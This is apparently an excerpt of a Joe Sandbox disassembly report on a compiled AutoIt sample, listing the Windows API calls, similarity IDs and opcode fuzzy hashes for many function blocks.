                                                            • Instruction Fuzzy Hash: 2A219831700208ABDB11AA659C86EEE7BBDFF49710F094039FE45DB291D6708D45D7D2
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0081134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0081135C
                                                            • BeginPath.GDI32(?), ref: 00811373
                                                            • SelectObject.GDI32(?,00000000), ref: 0081139C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 9f160c1ba698883a3251369b9fc7e4ca4831bc6e375fd583b09c43fe9f0f83a2
                                                            • Instruction ID: b60af1dc1b81700e730b64820d576978c7c7678f412d99590130daf87019e07d
                                                            • Opcode Fuzzy Hash: 9f160c1ba698883a3251369b9fc7e4ca4831bc6e375fd583b09c43fe9f0f83a2
                                                            • Instruction Fuzzy Hash: 8821287080120CEBDB119F65EC087A97BACFB10362F148327E920D66A5E77599A1EB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: ad5f0338c099092460bdccd887df9493a6543d21a3cb027ab4820ada55c0a237
                                                            • Instruction ID: 9a1c955e9b309cda53bb867aba44e1ad1bf1319bba995499409da54320d14490
                                                            • Opcode Fuzzy Hash: ad5f0338c099092460bdccd887df9493a6543d21a3cb027ab4820ada55c0a237
                                                            • Instruction Fuzzy Hash: 0A01F5B260510A7BE614A6295C46FBB735CFB637A8F054021FD05DA383FA54EE1182E1
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00874D5C
                                                            • __beginthreadex.LIBCMT ref: 00874D7A
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00874D8F
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00874DA5
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00874DAC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: e1aab81d57481be679236bee254af93bc29bdb63b46c1060f5f107577d947c64
                                                            • Instruction ID: 10e6ae7a2478134efa4ce6041ec7dbe9fe0b477ae70fd6bc7edb130b3cff3709
                                                            • Opcode Fuzzy Hash: e1aab81d57481be679236bee254af93bc29bdb63b46c1060f5f107577d947c64
                                                            • Instruction Fuzzy Hash: E41104B2904248BFC715ABACDC08A9A7FACFB45320F188366F918D3355E775CD5487A0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00868766
                                                            • GetLastError.KERNEL32(?,0086822A,?,?,?), ref: 00868770
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,0086822A,?,?,?), ref: 0086877F
                                                            • HeapAlloc.KERNEL32(00000000,?,0086822A,?,?,?), ref: 00868786
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0086879D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: d6bbed922432f3d871d8ba9aa611586cc68964688d291117149430419f385080
                                                            • Instruction ID: 3fe73c1446dab4b269c5efa149d177e2c95c1d2395aa82ea9e9e60a28f62064c
                                                            • Opcode Fuzzy Hash: d6bbed922432f3d871d8ba9aa611586cc68964688d291117149430419f385080
                                                            • Instruction Fuzzy Hash: A3016971200204FFDB255FA6DC88D6B7BACFF8A356B24053AF949D2260DA318C00CBA0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00875502
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00875510
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00875518
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00875522
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087555E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 6281a944d345e7d50bf23df10617c067295cc9c638c3b82fdc44afe962c6fdec
                                                            • Instruction ID: 2bd3849549f49d9e74920522ea92f48afb44454102ff9a9b3515a9c5e9d6c366
                                                            • Opcode Fuzzy Hash: 6281a944d345e7d50bf23df10617c067295cc9c638c3b82fdc44afe962c6fdec
                                                            • Instruction Fuzzy Hash: BA015732C00A2DDBCF04EFE8E888AEDBB79FB09711F044156EA05F2145DB709650C7A1
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?,?,0086799D), ref: 0086766F
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 0086768A
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 00867698
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?), ref: 008676A8
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 008676B4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: cedef9b6b2acf3a2bbadfded653708e37a67570a61b713531de86949e97bee6f
                                                            • Instruction ID: abe2126bf237151650a9e61655430e8fe65bd09b602754f85ac6e4ef8cef250d
                                                            • Opcode Fuzzy Hash: cedef9b6b2acf3a2bbadfded653708e37a67570a61b713531de86949e97bee6f
                                                            • Instruction Fuzzy Hash: F701D472600604BBDB105F18DC08BAA7BADFB48B55F150139FE05D2212E771DD5097E0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00868608
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00868612
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00868621
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00868628
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0086863E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 9029e87ccef6a652cfa50ae38c868aaae394a314d4a215c20e87d65eebd8d740
                                                            • Instruction ID: 78cb921fb660d58557349426edbd8045a17b6f945c59545aaa9d5a1446e5ac79
                                                            • Opcode Fuzzy Hash: 9029e87ccef6a652cfa50ae38c868aaae394a314d4a215c20e87d65eebd8d740
                                                            • Instruction Fuzzy Hash: E6F04F31241204EFEB151FA5DC8DE6F3BACFF89754B144626FA49C6161CB619C41DA60
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00868669
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00868673
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00868682
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00868689
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0086869F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: b339f45726223d4a6eda0bd3c29a69e58f019c63321b694b75799ed93c9041a6
                                                            • Instruction ID: 4db492006f33b0b4f6d0595056e37b0f6acbdbef99b3292f3ab0569ecf2a87c9
                                                            • Opcode Fuzzy Hash: b339f45726223d4a6eda0bd3c29a69e58f019c63321b694b75799ed93c9041a6
                                                            • Instruction Fuzzy Hash: 91F04F71200204EFEB152FA5EC8DE6B3BACFF89758B140126FA49C6151CB619941DB60
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0086C6BA
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0086C6D1
                                                            • MessageBeep.USER32(00000000), ref: 0086C6E9
                                                            • KillTimer.USER32(?,0000040A), ref: 0086C705
                                                            • EndDialog.USER32(?,00000001), ref: 0086C71F
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 952fa26a61fc37d3669feb7ad8920611e87ca5b747346be507009bfb5d41c51c
                                                            • Instruction ID: b901ff510e2db07f6d2b7111360c0fe6c9d796a7ec55f435f2f15b56195e88f9
                                                            • Opcode Fuzzy Hash: 952fa26a61fc37d3669feb7ad8920611e87ca5b747346be507009bfb5d41c51c
                                                            • Instruction Fuzzy Hash: 6A018670500708ABEB256B64ED4EFA677B8FF10705F08066EF696E14E1DBF4A9548F80
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 008113BF
                                                            • StrokeAndFillPath.GDI32(?,?,0084BAD8,00000000,?), ref: 008113DB
                                                            • SelectObject.GDI32(?,00000000), ref: 008113EE
                                                            • DeleteObject.GDI32 ref: 00811401
                                                            • StrokePath.GDI32(?), ref: 0081141C
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 335cd93722432604f88646a810936604ce6ac31e98acb2e960053cd0ba014fad
                                                            • Instruction ID: e7874c12462daf5cb5c0655c97986e88a1dd78c4d3a4a5c7aa3dd35c3c67c2eb
                                                            • Opcode Fuzzy Hash: 335cd93722432604f88646a810936604ce6ac31e98acb2e960053cd0ba014fad
                                                            • Instruction Fuzzy Hash: BDF0F63000160CEBDB156F66EC0C7983BA9FB00326F088336E629840B2E73549A5EF50
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0087C69D
                                                            • CoCreateInstance.OLE32(008A2D6C,00000000,00000001,008A2BDC,?), ref: 0087C6B5
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • CoUninitialize.OLE32 ref: 0087C922
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 4612fb4a45c4917e1fe71e9318db760384a1742c85d9d716cc992540f100e461
                                                            • Instruction ID: 6398e56f04cbce81d23f881c64f73634fbda305225a851a65c112d5b285f3a8d
                                                            • Opcode Fuzzy Hash: 4612fb4a45c4917e1fe71e9318db760384a1742c85d9d716cc992540f100e461
                                                            • Instruction Fuzzy Hash: 65A10971108205AFD700EF58C891EABB7ACFF98704F04491DF196D72A2DB70EA49CB52
                                                            APIs
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 00817BB1: _memmove.LIBCMT ref: 00817C0B
                                                            • __swprintf.LIBCMT ref: 0082302D
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00822EC6
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 00c7c40d55330d7c2420e7cbb705183b66408e9c2926ade6cdb45153a305ee63
                                                            • Instruction ID: c0b243be3aaa105fd0d6bf18c671a643f7210109e6d1e57bbde9a9e7ba7a2fe5
                                                            • Opcode Fuzzy Hash: 00c7c40d55330d7c2420e7cbb705183b66408e9c2926ade6cdb45153a305ee63
                                                            • Instruction Fuzzy Hash: EA915E715086119FC718EF28D895C6EB7B8FF85750F40491DF885D72A1EB24EE88CB62
                                                            APIs
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                            • CoInitialize.OLE32(00000000), ref: 0087BC26
                                                            • CoCreateInstance.OLE32(008A2D6C,00000000,00000001,008A2BDC,?), ref: 0087BC3F
                                                            • CoUninitialize.OLE32 ref: 0087BC5C
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: dcb13fc67758164ce97b23f67060660d829884dd393d51ff9199c59884095923
                                                            • Instruction ID: 516df21be939655e507f460f4cb5f7337e8439899db9f910b6f0e782d9c6c003
                                                            • Opcode Fuzzy Hash: dcb13fc67758164ce97b23f67060660d829884dd393d51ff9199c59884095923
                                                            • Instruction Fuzzy Hash: 2FA133756042019FCB10DF18C494E9ABBEAFF89314F148998F899DB3A1CB31ED45CB92
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 008352DD
                                                              • Part of subcall function 00840340: __87except.LIBCMT ref: 0084037B
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: b94bd7f0400fb529f7c1028d4afd682c3b6337f7aa3f1fa2db361983a6416747
                                                            • Instruction ID: 0a9d50beade7d8c3d9ceec04d60f0a07169ac8362289a479aef5b4d68975a665
                                                            • Opcode Fuzzy Hash: b94bd7f0400fb529f7c1028d4afd682c3b6337f7aa3f1fa2db361983a6416747
                                                            • Instruction Fuzzy Hash: 44517931A0DA0987D7107B28C91136B2B90FB81754F208D59E6C5C27EAEF748DC49ECA
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$+
                                                            • API String ID: 0-2552117581
                                                            • Opcode ID: ce484e1ea3686c9c7546f7802bfc90246f666a20b3ad99c1d79e48be6e101022
                                                            • Instruction ID: 7703fabb4e2000c21456b3ebea4964835ad78f8cd7f821631b24fb0f0a3561e4
                                                            • Opcode Fuzzy Hash: ce484e1ea3686c9c7546f7802bfc90246f666a20b3ad99c1d79e48be6e101022
                                                            • Instruction Fuzzy Hash: 7C51217510524ACFCF169F28C498AFA7BA4FF55310F184065F891DB2E0D7309C82CBA1
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: bdcc29f6664520a80bcffe0195469ab7d51ffcf556577557651613cf308d72d9
                                                            • Instruction ID: 098c61aae8b223b3a4d68da2d00ad45fc09e02afe2428174dd3254ae92bba37c
                                                            • Opcode Fuzzy Hash: bdcc29f6664520a80bcffe0195469ab7d51ffcf556577557651613cf308d72d9
                                                            • Instruction Fuzzy Hash: 2F51BE719007199BCB24DF65D885BAABBF4FF04314F20856EE68ACA241F770D694CB84
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0089F910,00000000,?,?,?,?), ref: 00897C4E
                                                            • GetWindowLongW.USER32 ref: 00897C6B
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00897C7B
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 762165dd213480038548514cc3bccf372aad79180efcf8d1e528337cc8277fbc
                                                            • Instruction ID: c226c9508e0ab4e23ace09628697dc5b7d33086e92e8535fd94fc810be4d012f
                                                            • Opcode Fuzzy Hash: 762165dd213480038548514cc3bccf372aad79180efcf8d1e528337cc8277fbc
                                                            • Instruction Fuzzy Hash: 8631AE31214209ABDF15AF38DC45BEA77A9FF45328F284725F975E22E0D731E8509B50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008976D0
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008976E4
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00897708
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 6d8a8e24d83194fd076b56bda2d4b963919f6bfeb72e75253edc5736105f0894
                                                            • Instruction ID: 0dccaac1263eafcc21f0baa74494dcbd49c6f7067bae61c65eb6af65e0a17381
                                                            • Opcode Fuzzy Hash: 6d8a8e24d83194fd076b56bda2d4b963919f6bfeb72e75253edc5736105f0894
                                                            • Instruction Fuzzy Hash: 8121BF32610218BBDF169EA4CC46FEA3B69FF58714F150214FE15AB1D0D6B1A8508BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00896FAA
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00896FBA
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00896FDF
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008979E1
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008979F6
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00897A03
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00814C2E), ref: 00814CA3
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00814CB5
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00814CE1,?), ref: 00814DA2
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00814DB4
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00814D2E,?,00814F4F,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00814D81
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,008912C1), ref: 00891080
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00891092
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00889009,?,0089F910), ref: 00889403
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00889415
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
APIs
• CharLowerBuffW.USER32(?,?), ref: 0088E3D2
• CharLowerBuffW.USER32(?,?), ref: 0088E415
  • Part of subcall function 0088DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0088DAD9
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0088E615
• _memmove.LIBCMT ref: 0088E628
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 008883D8
• CoUninitialize.OLE32 ref: 008883E3
  • Part of subcall function 0086DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0086DAC5
• VariantInit.OLEAUT32(?), ref: 008883EE
• VariantClear.OLEAUT32(?), ref: 008886BF
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008A2C7C,?), ref: 00867C32
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008A2C7C,?), ref: 00867C4A
• CLSIDFromProgID.OLE32(?,?,00000000,0089FB80,000000FF,?,00000000,00000800,00000000,?,008A2C7C,?), ref: 00867C6F
• _memcmp.LIBCMT ref: 00867C90
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            APIs
                                                            • GetWindowRect.USER32(017CE6B8,?), ref: 00899AD2
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00899B05
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00899B72
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00886CE4
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886CF4
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00886D58
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886D64
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0089F910), ref: 008867BA
                                                            • _strlen.LIBCMT ref: 008867EC
                                                            Similarity
                                                            • API ID: _strlen
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0087BB09
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0087BB2F
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0087BB54
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0087BB80
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00898B4D
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0089AE1A
                                                            • GetWindowRect.USER32(?,?), ref: 0089AE90
                                                            • PtInRect.USER32(?,?,0089C304), ref: 0089AEA0
                                                            • MessageBeep.USER32(00000000), ref: 0089AF11
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00871037
